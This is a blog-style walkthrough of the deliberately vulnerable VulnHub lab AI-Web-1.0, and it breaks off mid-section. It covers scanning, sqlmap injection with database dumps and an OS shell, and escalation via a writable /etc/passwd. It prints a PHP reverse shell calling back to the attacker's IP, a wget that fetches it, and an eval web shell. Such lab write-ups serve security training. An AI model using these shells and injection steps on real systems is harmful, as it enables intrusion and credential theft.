# VulnHub Target Machine Series: AI-Web-1.0

2024-10-03 16:01:03 · 93 views

Kali VM download (pick the first download, about 3 GB):

https://www.kali.org/get-kali/#kali-virtual-machines

Target machine download link:

https://download.vulnhub.com/aiweb/AI-Web-1.0.7z

## Basic setup for first-time Kali users (skip this if you are not a beginner)

The Kali VM's login username and password are both kali. After logging in you land on the desktop.

The first step is optional: if you do not want the black background, you can change it to another one.

Next, set the terminal background and font size (Ctrl+Shift together with + or - zooms the font in and out). Note that every time you reopen the terminal it reverts to the system default.

Because no root password is set by default, set one with the following command:

```
┌──(kali㉿kali)-[~]
└─$ sudo passwd root
```

Enter the kali account's password (kali), then the new root password, and the root password is set.

To make later work easier, log out and log back in to the Kali VM as root.

That is the Kali setup I did before starting the AI-Web-1.0 box.

## Information Gathering

Check the Kali Linux host's own IP address (here it is 192.168.200.130):

```
┌──(root㉿kali)-[~]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.200.130  netmask 255.255.255.0  broadcast 192.168.200.255
        inet6 fe80::e7e2:e104:ca:839f  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:bc:f3:3f  txqueuelen 1000  (Ethernet)
        RX packets 356  bytes 23058 (22.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 34  bytes 4122 (4.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 16  bytes 960 (960.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 960 (960.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```

Find the live hosts on the same subnet (in my setup both the Kali VM and the target run in NAT mode):

```
┌──(root㉿kali)-[~]
└─# arp-scan 192.168.200.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:bc:f3:3f, IPv4: 192.168.200.130
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.200.1	00:50:56:c0:00:08	VMware, Inc.
192.168.200.2	00:50:56:fe:ad:16	VMware, Inc.
192.168.200.129	00:0c:29:b0:83:be	VMware, Inc.
192.168.200.254	00:50:56:e0:6b:0c	VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.088 seconds (122.61 hosts/sec). 4 responded
```

Command breakdown:

- arp-scan: a network scanning tool that discovers devices on the local LAN by sending ARP (Address Resolution Protocol) requests. Each request asks which device owns a given IP address; the ARP replies reveal which hosts are up and what their MAC addresses are.
- 192.168.200.0/24: the IP range to scan, written in CIDR (Classless Inter-Domain Routing) notation.

### Getting the target's IP address

Looking at the AI-Web-1.0 target VM's settings gives its MAC address, which matches the 00:0c:29:b0:83:be entry in the arp-scan output above.

So the target's IP address is 192.168.200.129.

### Checking the services and OS version on the AI-Web-1.0 target

Command used: nmap -sS -sV -T4 -A -p- 192.168.200.129

```
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -T4 -A -p- 192.168.200.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 22:41 EDT
Nmap scan report for 192.168.200.129
Host is up (0.00049s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd
| http-robots.txt: 2 disallowed entries
|_/m3diNf0/ /se3reTdir777/uploads/
|_http-server-header: Apache
|_http-title: AI Web 1.0
MAC Address: 00:0C:29:B0:83:BE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.49 ms 192.168.200.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.43 seconds
```

Command breakdown:

- nmap: an open-source network scanning and security auditing tool.
- -sS: use a TCP SYN scan. A SYN scan sends a SYN packet to the target port and waits for the reply: a SYN-ACK means the port is open, an RST (reset) means it is closed. It is usually faster than a full-connect scan because it never completes the TCP three-way handshake.
- -sV: try to determine the version of each service running on the target.
- -T4: the timing template. -T4 is "aggressive": it speeds the scan up but also makes it more likely that the target notices the scanning activity.
- -A: enable OS detection and script scanning. nmap sends a series of probes to the target and analyzes the responses to determine its operating system.
- -p-: scan every port on the target (1 through 65535).

From the output we learn:

1. Open port on the target: 80
2. The HTTP service is provided by Apache HTTP Server
3. Operating system: Linux 3.2 - 4.9
4. Web service details: the robots.txt entries, the HTML title, the server header, and so on

### Visiting the web service

Browse to http://192.168.200.129.

The page returns "Not even Google search my contents!", which gives us nothing useful.

### Directory scanning the web server

dirb http://192.168.200.129

```
┌──(root㉿kali)-[~]
└─# dirb http://192.168.200.129

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Sep  9 23:25:41 2024
URL_BASE: http://192.168.200.129/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.200.129/ ----
+ http://192.168.200.129/index.html (CODE:200|SIZE:141)
+ http://192.168.200.129/robots.txt (CODE:200|SIZE:82)
+ http://192.168.200.129/server-status (CODE:403|SIZE:222)

-----------------
END_TIME: Mon Sep  9 23:25:44 2024
DOWNLOADED: 4612 - FOUND: 3
```

The scan gives us two URLs worth visiting:

http://192.168.200.129/robots.txt

http://192.168.200.129/server-status

Command breakdown:

- dirb: a dictionary-based web directory scanner. It sends an HTTP request for each wordlist entry and analyzes the server's responses to find directories and files that exist on the target.
- http://192.168.200.129: the URL or IP address of the site to scan; it must be prefixed with http:// or https://.

### Visiting the discovered files and directories

http://192.168.200.129/robots.txt lists the two disallowed paths.

http://192.168.200.129/server-status is forbidden (403).

Next, visit the two directories that robots.txt names:

http://192.168.200.129/m3diNf0/

http://192.168.200.129/se3reTdir777/uploads/

Both are forbidden, so there is no useful information here yet.

Continue by scanning the subdirectories on the target web server:

dirb http://192.168.200.129/m3diNf0/

```
┌──(root㉿kali)-[~]
└─# dirb http://192.168.200.129/m3diNf0/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Sep  9 23:55:30 2024
URL_BASE: http://192.168.200.129/m3diNf0/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.200.129/m3diNf0/ ----
+ http://192.168.200.129/m3diNf0/info.php (CODE:200|SIZE:84275)

-----------------
END_TIME: Mon Sep  9 23:55:33 2024
DOWNLOADED: 4612 - FOUND: 1
```

This gives an accessible path:

http://192.168.200.129/m3diNf0/info.php

It displays the target's PHP configuration, the installed PHP version, and details of the loaded modules.

Reading through it carefully, I found:

The web root's absolute path: /home/www/html/web1x443290o2sdf92213

dirb http://192.168.200.129/se3reTdir777/uploads/

```
┌──(root㉿kali)-[~]
└─# dirb http://192.168.200.129/se3reTdir777/uploads/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Sep 10 00:01:32 2024
URL_BASE: http://192.168.200.129/se3reTdir777/uploads/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.200.129/se3reTdir777/uploads/ ----

-----------------
END_TIME: Tue Sep 10 00:01:35 2024
DOWNLOADED: 4612 - FOUND: 0
```

No accessible URL was found.

Continue with the parent directory:

dirb http://192.168.200.129/se3reTdir777/

```
┌──(root㉿kali)-[~]
└─# dirb http://192.168.200.129/se3reTdir777/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Sep 10 00:03:22 2024
URL_BASE: http://192.168.200.129/se3reTdir777/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.200.129/se3reTdir777/ ----
+ http://192.168.200.129/se3reTdir777/index.php (CODE:200|SIZE:53)
==> DIRECTORY: http://192.168.200.129/se3reTdir777/uploads/

---- Entering directory: http://192.168.200.129/se3reTdir777/uploads/ ----

-----------------
END_TIME: Tue Sep 10 00:03:28 2024
DOWNLOADED: 9224 - FOUND: 1
```

This gives an accessible URL:

http://192.168.200.129/se3reTdir777/index.php

It is a form that looks up information by user ID.

After testing a few inputs, anyone who has worked through DVWA will recognize the web vulnerability here as SQL injection.

Submitting 1' returns a database error:

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
```

The server returns a SQL syntax error: the statement's quotes were not closed properly. The query behind the form is roughly

```sql
SELECT * FROM table_name WHERE column_name = '1' AND another_column = 'value;
```

where value is our input 1', whose single quote leaves the literal on the right unclosed.
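The unclosed-quote behaviour described above, as an added example that is not part of the original writeup: the same ID lookup written the vulnerable way (string concatenation) and the hardened way (bound parameter), run against a constructed SQLite copy of the aiweb1.user table dumped later in this writeup. SQLite stands in for the target's MySQL, so the error text differs but the failure mode is the same.

```python
import sqlite3

# Constructed sample data mirroring the aiweb1.user rows dumped later in this
# walkthrough (firstName, id, lastName). SQLite stands in for the target's MySQL.
def build_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, firstName TEXT, lastName TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "root", "root"), (3, "mysql", "mysql")],
    )
    return conn


def lookup_unsafe(conn, uid):
    """Vulnerable pattern: the uid field is pasted straight into the SQL text."""
    sql = "SELECT firstName, lastName FROM user WHERE id = '" + uid + "'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # An input such as 1' leaves the quote unbalanced and the DBMS reports a
        # syntax error, which is exactly what the target's index.php leaked.
        return "SQL error: " + str(exc)


def lookup_safe(conn, uid):
    """Hardened pattern: a bound parameter is always data, never SQL text."""
    return conn.execute(
        "SELECT firstName, lastName FROM user WHERE id = ?", (uid,)
    ).fetchall()


# The MySQL error prefix shown above; a response body containing it tells a
# defender (or a scanner) that raw DBMS errors are reaching the client.
MYSQL_ERROR_SIGNATURE = "You have an error in your SQL syntax"


def leaks_sql_error(response_body):
    return MYSQL_ERROR_SIGNATURE in response_body


if __name__ == "__main__":
    db = build_sample_db()
    for probe in ("1", "1'", "' OR '1'='1"):
        print(repr(probe), "unsafe:", lookup_unsafe(db, probe), "safe:", lookup_safe(db, probe))
```

With the vulnerable lookup, 1' produces the syntax error and the OR tautology returns every row; the parameterized lookup returns the admin row for 1 and an empty result for both malformed inputs.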

## Exploitation

On the 192.168.200.129/se3reTdir777/index.php page, press F12 to capture the request in the browser's developer tools.

I recommend pointing the browser at a proxy and using Burp Suite, which ships with Kali, to capture the traffic; it shows far more detail.

Proxy: a proxy is a network service that lets a client connect to a target server indirectly.

How it works: when the client wants to reach a target server, it first sends the request to the proxy server. Here the proxy is what lets Burp Suite capture the packets (and the returned resources).

Open Burp Suite.

Here we capture not only the request, including the injection point we need, but also the server's response on the right.

### Testing the injection with SQLMap

Enumerating the databases:

sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" --dbs

```
# main output
[00:42:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[00:42:28] [INFO] fetching database names
available databases [2]:
[*] aiweb1
[*] information_schema

[00:42:28] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'

[*] ending @ 00:42:28 /2024-09-10/
```

The output shows two databases, aiweb1 and information_schema. From here we can enumerate the tables in each database, then the columns in each table, then the data itself.

Command breakdown:

- sqlmap: an automated SQL injection tool that finds and exploits database injection flaws.
- -u "http://192.168.200.129/se3reTdir777/index.php/": the URL to test.
- -data "uid=1&Operation=Submit": the POST body; sqlmap sends these fields as part of a POST request to the server.
- --dbs: ask sqlmap to enumerate the names of the back-end databases.

### Enumerating tables

sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" -D aiweb1 --tables

```
# main output
[00:50:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[00:50:44] [INFO] fetching tables for database: 'aiweb1'
Database: aiweb1
[2 tables]
+------------+
| user       |
| systemUser |
+------------+

[00:50:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'
```

This reveals two tables in the aiweb1 database: user and systemUser.

Enumerating the other database's tables:

sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" -D information_schema --tables

```
# This returns 60-odd tables; looking over the names, nothing useful stands out
[00:55:07] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[00:55:07] [INFO] fetching tables for database: 'information_schema'
Database: information_schema
[61 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMN_PRIVILEGES                     |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_PER_INDEX                  |
| INNODB_CMP_PER_INDEX_RESET            |
| INNODB_CMP_RESET                      |
| INNODB_FT_BEING_DELETED               |
| INNODB_FT_CONFIG                      |
| INNODB_FT_DEFAULT_STOPWORD            |
| INNODB_FT_DELETED                     |
| INNODB_FT_INDEX_CACHE                 |
| INNODB_FT_INDEX_TABLE                 |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_METRICS                        |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_DATAFILES                  |
| INNODB_SYS_FIELDS                     |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_TABLESPACES                |
| INNODB_SYS_TABLESTATS                 |
| INNODB_SYS_VIRTUAL                    |
| INNODB_TEMP_TABLE_INFO                |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| OPTIMIZER_TRACE                       |
| PARAMETERS                            |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| COLUMNS                               |
| ENGINES                               |
| EVENTS                                |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| TABLES                                |
| TRIGGERS                              |
+---------------------------------------+

[00:55:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'

[*] ending @ 00:55:07 /2024-09-10/
```

So for the column enumeration that follows, we work with the tables in the aiweb1 database.

### Enumerating columns

sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns

```
[00:58:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[00:58:28] [INFO] fetching columns for table 'user' in database 'aiweb1'
Database: aiweb1
Table: user
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| firstName | varchar(25) |
| id        | int(11)     |
| lastName  | varchar(25) |
+-----------+-------------+

[00:58:28] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'
```

This reveals the columns firstName, id and lastName.

sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" -D aiweb1 -T systemUser --columns

```
[01:00:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[01:00:21] [INFO] fetching columns for table 'systemUser' in database 'aiweb1'
Database: aiweb1
Table: systemUser
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(50) |
| userName | varchar(25) |
+----------+-------------+

[01:00:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'
```

This time we get password and userName columns. Could these be login credentials? Let's dump the rows.

### Dumping rows

sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C firstName,id,lastName --dump

```
[01:04:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[01:04:21] [INFO] fetching entries of column(s) 'firstName,id,lastName' for table 'user' in database 'aiweb1'
Database: aiweb1
Table: user
[3 entries]
+-----------+----+----------+
| firstName | id | lastName |
+-----------+----+----------+
| admin     | 1  | admin    |
| root      | 2  | root     |
| mysql     | 3  | mysql    |
+-----------+----+----------+

[01:04:21] [INFO] table 'aiweb1.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.200.129/dump/aiweb1/user.csv'
[01:04:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'

[*] ending @ 01:04:21 /2024-09-10/
```

This gives three users: admin, root and mysql.

sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" -D aiweb1 -T systemUser -C id,password,userName --dump

```
Database: aiweb1
Table: systemUser
[3 entries]
+----+----------------------------------------------+-----------+
| id | password                                     | userName  |
+----+----------------------------------------------+-----------+
| 1  | RmFrZVVzZXJQYXNzdzByZA==                     | t00r      |
| 2  | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== | aiweb1pwn |
| 3  | TjB0VGhpczBuZUFsczA=                         | u3er      |
+----+----------------------------------------------+-----------+

[01:06:01] [INFO] table 'aiweb1.systemUser' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.200.129/dump/aiweb1/systemUser.csv'
[01:06:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'
```

Now we have usernames and passwords, but the passwords are obviously encoded. A quick lookup shows they are Base64-encoded.

I decoded them with this site: https://www.cmd5.com/

```
+----+---------------------------------+-----------+
| id | password                        | userName  |
+----+---------------------------------+-----------+
| 1  | FakeUserPassw0rd                | t00r      |
| 2  | MyEvilPass_f908sdaf9_sadfasf0sa | aiweb1pwn |
| 3  | N0tThis0neAls0                  | u3er      |
+----+---------------------------------+-----------+
```

After testing, none of these log in anywhere!

But we already know the web root's absolute path: /home/www/html/web1x443290o2sdf92213

So we can try to get an os-shell on the target.

### Getting an os-shell

sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" --os-shell

```
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" --os-shell
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.5#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:15:13 /2024-09-10/

[01:15:13] [INFO] resuming back-end DBMS 'mysql'
[01:15:13] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 1031=1031#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x7178707171,(SELECT (ELT(9269=9269,1))),0x7176627071),9269)-- kGXT&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 2452 FROM (SELECT(SLEEP(5)))PAiH)-- ViEd&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT CONCAT(0x7178707171,0x694f46677062746b756556595347586349546f4d4c54776e6777754654494b4747526d586f486b6e,0x7176627071),NULL,NULL#&Operation=Submit
---
[01:15:13] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[01:15:13] [INFO] going to use a web backdoor for command prompt
[01:15:13] [INFO] fingerprinting the back-end DBMS operating system
[01:15:13] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
[01:15:26] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: /home/www/html/web1x443290o2sdf92213
[01:15:45] [WARNING] unable to automatically parse any web server path
[01:15:45] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/' via LIMIT 'LINES TERMINATED BY' method
[01:15:45] [WARNING] unable to upload the file stager on '/home/www/html/web1x443290o2sdf92213/'
[01:15:45] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/' via UNION method
[01:15:45] [WARNING] expect junk characters inside the file as a leftover from UNION query
[01:15:45] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[01:15:45] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/index.php/' via LIMIT 'LINES TERMINATED BY' method
[01:15:45] [WARNING] unable to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/index.php/'
[01:15:45] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/index.php/' via UNION method
[01:15:45] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[01:15:45] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 22 times
[01:15:45] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.200.129'

[*] ending @ 01:15:45 /2024-09-10/

┌──(root㉿kali)-[~]
└─#
```

At the prompts, answer 4, n and 2.

As the output shows, giving the web root's absolute path as the writable directory did not get us an os-shell.

After some searching I found that the path to enter is:

/home/www/html/web1x443290o2sdf92213//se3reTdir777/uploads/

The reason is that uploads is a directory that permits file uploads, so the DBMS process user is able to write there.

```
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.5#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:19:08 /2024-09-10/

[01:19:08] [INFO] resuming back-end DBMS 'mysql'
[01:19:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 1031=1031#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x7178707171,(SELECT (ELT(9269=9269,1))),0x7176627071),9269)-- kGXT&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 2452 FROM (SELECT(SLEEP(5)))PAiH)-- ViEd&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT CONCAT(0x7178707171,0x694f46677062746b756556595347586349546f4d4c54776e6777754654494b4747526d586f486b6e,0x7176627071),NULL,NULL#&Operation=Submit
---
[01:19:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[01:19:08] [INFO] going to use a web backdoor for command prompt
[01:19:08] [INFO] fingerprinting the back-end DBMS operating system
[01:19:09] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
[01:19:11] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: /home/www/html/web1x443290o2sdf92213//se3reTdir777/uploads/
[01:19:14] [WARNING] unable to automatically parse any web server path
[01:19:14] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' via LIMIT 'LINES TERMINATED BY' method
[01:19:14] [INFO] the file stager has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.200.129:80/se3reTdir777/uploads/tmpungyo.php
[01:19:14] [INFO] the backdoor has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.200.129:80/se3reTdir777/uploads/tmpbabky.php
[01:19:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
```

The os-shell is obtained.

But because the os-shell is unstable and runs as a low-privileged user, we move on to privilege escalation.

## Privilege Escalation

### Creating and uploading a reverse-shell file

Method one:

The reverse-shell file (the IP is the Kali machine's address, 192.168.200.130, matching the file shown below):

```php
<?php $sock=fsockopen("192.168.200.130",4567); exec("/bin/sh -i <&3 >&3 2>&3"); ?>
```

```
┌──(root㉿kali)-[~]
└─# cat shell.php
<?php
$sock=fsockopen("192.168.200.130",4567);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
```

Start a simple HTTP server with Python:

```
┌──(root㉿kali)-[~]
└─# python -m http.server 9875
Serving HTTP on 0.0.0.0 port 9875 (http://0.0.0.0:9875/) ...
```

Check it in the local browser.

In the os-shell, run: wget http://192.168.200.130:9875/shell.php

```
os-shell> wget http://192.168.200.130:9875/shell.php
do you want to retrieve the command standard output? [Y/n/a] y
No output
os-shell> wget http://192.168.200.130:9875/shell.php
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
--2024-09-10 05:29:41--  http://192.168.200.130:9875/shell.php
Connecting to 192.168.200.130:9875... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84 [application/octet-stream]
Saving to: 'shell.php'

     0K                                                       100% 35.8M=0s

2024-09-10 05:29:41 (35.8 MB/s) - 'shell.php' saved [84/84]

---
os-shell> ls
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
shell.php
tmpbabky.php
tmpungyo.php
---
```

Because the os-shell is unstable, repeat the command a few times if it returns No output.

Start a port listener:

On the Kali machine: nc -lvp 4567

Then in the os-shell run: php shell.php

The reverse shell connects successfully.

Method two:

Write a shell.php file with the following content:

```php
<?php @eval($_POST["cmd"]) ?>
```

Then upload it to the target from the Kali machine with:

sqlmap -u "http://192.168.200.129/se3reTdir777/index.php/" -data "uid=1&Operation=Submit" --file-write ./shell.php --file-dest

The listener steps that follow are the same as in method one (or you can use AntSword).

### Upgrading to an interactive shell with Python

python -c 'import pty;pty.spawn("/bin/bash")'

Then run the "three musketeers" of basic recon:

- whoami: the current user
- id: the user's id, groups and group ids
- pwd: the current directory
- uname -a (on Linux): the kernel version

```
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ whoami
www-data
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ uname -a
Linux aiweb1 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ pwd
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads
```

Searching for the flag with find / -name flag* returns nothing, which means we need higher privileges!

Running ls -al /etc/passwd shows that the current user is actually able to write to /etc/passwd!

This is the SetUID vulnerability; to defend against it, change the permissions on /etc/passwd so that only root (or another administrator account) can write to it!

```
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ ls -al /etc/passwd
-rw-r--r-- 1 www-data www-data 1664 Aug 21  2019 /etc/passwd
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$
```

### Creating a user

openssl passwd -1 -salt bpz 123456

Command breakdown:

